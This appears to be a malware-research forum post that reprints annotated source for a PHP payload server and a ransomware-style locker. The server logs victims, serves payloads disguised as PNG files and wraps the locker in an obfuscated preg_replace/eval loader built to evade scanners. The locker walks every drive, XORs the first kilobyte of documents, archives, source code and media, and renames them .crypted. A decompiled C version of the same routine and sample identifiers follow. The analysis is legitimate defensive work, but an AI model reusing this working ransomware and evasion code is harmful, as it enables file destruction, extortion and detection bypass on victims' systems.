        // N.bin is served. N=5 is the PHP locker/decrypter shown further down this page.
        $n = (isset($_GET["rnd"])) ? substr($_GET["rnd"],-1)*1 : 0;
 
        // Check-in log: "<unix time>\t<client IP>\t<Host header>\t<request URI>" appended to
        // document.txt beside this script. This is effectively the victim list and the
        // first artifact to preserve when the panel is taken down.
        $fp = @fopen("document.txt", "a");
        @fputs($fp, time()."\t".$_SERVER["REMOTE_ADDR"]."\t".$_SERVER["HTTP_HOST"]."\t".$_SERVER["REQUEST_URI"]."\n");
        @fclose($fp);
 
        if (@file_exists($n.".bin"))
        {
            // Whatever is served is labelled as a PNG attachment with a random name
            // (1-16 hex chars of an md5 over a random number).
            header("Content-Type: image/png");
            header("Content-Disposition: attachment; filename=".substr(md5(mt_rand(1,10000000)),0,mt_rand(1,16)).".png");
 
            if ($n == 5)
            {
                // Locker mode: 'd' (decrypt) only if `ad` is a listed address AND no `id`
                // was sent; otherwise 'e' (encrypt).
                $act = (in_array($_GET["ad"],$ads) && !isset($_GET["id"])) ? "d" : "e";
 
                            $php = file_get_contents($n.".bin");
 
                // XOR key: three bytes per character of `ad`,
                //   (ord*(i+1))%256, (ord*(i+2))%256, (ord*(i+3))%256
                // -- a pure function of the `ad` value, so anyone who knows that value can
                // rebuild the key and reverse the locker. (If only `id` was sent, `ad` is
                // undefined here and the key comes out empty.)
                $key = "";
                for ($i=0; $i<strlen($_GET["ad"]); $i++) $key .= chr((ord($_GET["ad"][$i])*($i+1))%256).chr((ord($_GET["ad"][$i])*($i+2))%256).chr((ord($_GET["ad"][$i])*($i+3))%256);
 
                // Fill the locker template: mode, base64 key, and the drive-letter range
                // 67..90 (chr() -> 'C'..'Z') consumed by its outer loop.
                $php = str_replace("<%ACT%>", $act, $php);
                $php = str_replace("<%KEY%>", base64_encode($key), $php);
                $php = str_replace("<%DRF%>", "67", $php);
                $php = str_replace("<%DRT%>", "90", $php);
                // Turns $str into a PHP expression that evaluates back to it, for the loader
                // below: each byte becomes either "c" (79% of the time, never for '"' or '.')
                // or chr(N); the pieces are joined with '.' and the "." seams between quoted
                // characters are removed, merging runs of them into one literal. Output varies
                // per call because of mt_rand(). Note the legacy (array, glue) argument order
                // to implode(), which PHP 8.0 no longer accepts.
                function Senc($str)
                {
                    $enc = array();
                    for ($i=0; $i<strlen($str); $i++) $enc[] = (mt_rand(1,100) < 80 && $str[$i] != chr(34) && $str[$i] != chr(46)) ? chr(34).$str[$i].chr(34) : "chr(".ord($str[$i]).")";
                    return str_replace(chr(34).chr(46).chr(34), "", implode($enc,"."));
                }
 
                // Strip the open/close tags from the locker source so it can be embedded.
                $php = trim(str_replace("<"."?php", "", str_replace("?".">", "", $php)));
                // Random variable names ($<letter><1-1000>) and a throwaway md5 token make
                // every delivered copy byte-different. ($preg is assigned in the output but
                // the call below names preg_replace() directly, so it is never used.)
                $preg = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
                $block = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
                $templ = "$".chr(mt_rand(97,122)).mt_rand(1,1000);
                $trash = md5(mt_rand(1,1000000));
                // Loader: $block = 'eval(base64_decode("<locker>"));', $templ = "/<trash>/e",
                // then preg_replace($templ, $block, "<trash>") matches the token and, because
                // of the /e modifier, evaluates $block as PHP. All literals go through Senc(),
                // so "eval" and "preg_replace" never appear contiguously in the delivered
                // file. /e was deprecated in PHP 5.5 and removed in 7.0, so this only runs on
                // PHP <= 5.6; the preg_replace-/e + eval(base64_decode()) pairing is a
                // well-known loader/webshell pattern for scanners to match on.
                $php = "<"."?php ".$preg."=".Senc("preg_replace").";".$block."=".Senc("eval(base64_decode(".chr(34).base64_encode($php).chr(34)."));").";".$templ."=".Senc("/".$trash."/e").";preg_replace(".$templ.",".$block.",".Senc($trash)."); ?".">";
 
                header("Content-Length: ".strlen($php));
                print $php;
            }
            else
            {
                // Any other N.bin is streamed verbatim (still labelled image/png above).
                header("Content-Length: ".@filesize($n.".bin"));
                @readfile($n.".bin");
            }
 
        }
 
        exit;
    }
 
    ?>
decryptor (5.bin)
<?php
 
// Body of 5.bin as delivered by index.php above; the <%...%> placeholders are filled
// in server-side before it is sent.
// No execution time limit: the walk below touches every file on every drive.
set_time_limit(0);
 
// <%DRF%>..<%DRT%> arrive as 67 and 90 (see index.php), i.e. chr() yields 'C'..'Z':
// start a recursive walk at the root of every drive letter that exists.
for($i=<%DRF%>;$i<=<%DRT%>;$i++) if(@is_dir(chr($i).':')) Tree(chr($i).':');
 
/**
 * Recursive file walker of the locker/decrypter.
 *
 * Both placeholders are substituted by index.php before delivery:
 *   <%ACT%>  'e' = encrypt: files on the extension list are XORed and renamed *.crypted
 *            'd' = decrypt: only *.crypted files are touched and the suffix is removed
 *   <%KEY%>  base64 of the XOR key index.php derives from the `ad` request parameter
 *
 * Only the first 1024 bytes of each file are XORed with the key repeated; XOR is its
 * own inverse, so one loop serves both directions. Everything past the first 1 KiB is
 * left intact and the key is a deterministic function of `ad`, so affected files are
 * recoverable without the operator's cooperation.
 *
 * Every filesystem call is @-suppressed, so failures are silent.
 *
 * @param string $p  directory to walk (e.g. 'C:')
 */
function Tree($p)
{
    $a='<%ACT%>';
    $k=base64_decode('<%KEY%>');
    $s=chr(92);
 
    // Skip system/program/temp trees (a backslash followed by one of the names) and
    // anything whose path contains "recycle".
    if(preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) return;
 
    $dp=@opendir($p);
 
    if($dp===false) return;
 
    while($o=@readdir($dp)) if($o!='.'&&$o!='..')
    {
        if (@is_dir($p.$s.$o))
        {
            Tree($p.$s.$o);
        }
        // Target selection: in 'e' mode the long extension list below (archives, office
        // documents, source code, databases, images, video, audio, disk images); in 'd'
        // mode only files already ending in .crypted.
        elseif ($a=='e'&&preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o) || $a=='d'&&preg_match('/[.](crypted)$/i',$o))
        {
            // Open in place, read at most 1024 bytes, XOR each byte with the key cycled by
            // position, and write the block back at offset 0.
            $fp=@fopen($p.$s.$o,'r+');
            if ($fp!==false)
            {
                $x=@fread($fp,1024);
                for($i=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));
                @fseek($fp,0);
                @fwrite($fp,$x);
                @fclose($fp);
 
                // Rename: append .crypted when encrypting, strip it when decrypting.
                if($a=='e')
                {
                    @rename($p.$s.$o, $p.$s.$o.'.crypted');
                }
                else
                {
                    @rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));
                }
            }
        }
    }
 
    @closedir($dp);
}
 
?>
 #29457  by EP_X0FF
 Tue Oct 18, 2016 9:32 am
ikolor wrote:next ..
https://www.virustotal.com/en/file/c65f ... /analysis/

https://www.virustotal.com/en/file/7522 ... 464281473/
0.bin - Genius
 /* Decompiler (Hex-Rays style) excerpt from 0.bin; the function start and the
    definition of Mode are outside this excerpt. a2 looks like an argument block with
    the file name at +4 and the key string at +8 -- TODO confirm against the caller. */
 Filename = *(char **)(a2 + 4);
  Str = *(char **)(a2 + 8);
  /* One-byte scratch buffer: the file is processed a byte at a time. */
  Dst = malloc(1u);
  memset(Dst, 0, 1u);
  Offset = 0;
  /* Read the byte at Offset, XOR it with the key cycled by position, seek back and
     overwrite it; stops at EOF or after 1024 bytes. Same XOR-the-first-1-KiB scheme
     as the PHP Tree() routine above, so the same key reverses it. */
  for ( File = fopen(Filename, Mode); fread(Dst, 1u, 1u, File) && Offset < 1024; fseek(File, Offset, 0) )
  {
    *(_BYTE *)Dst ^= Str[Offset % (signed int)strlen(Str)];
    fseek(File, Offset++, 0);
    fwrite(Dst, 1u, 1u, File);
    memset(Dst, 0, 1u);
  }
  fclose(File);
1.bin - Win32/Kovter
2.bin - Win32/Miuref
h.exe - Win32/Skidlo

Posts moved to Kovter thread.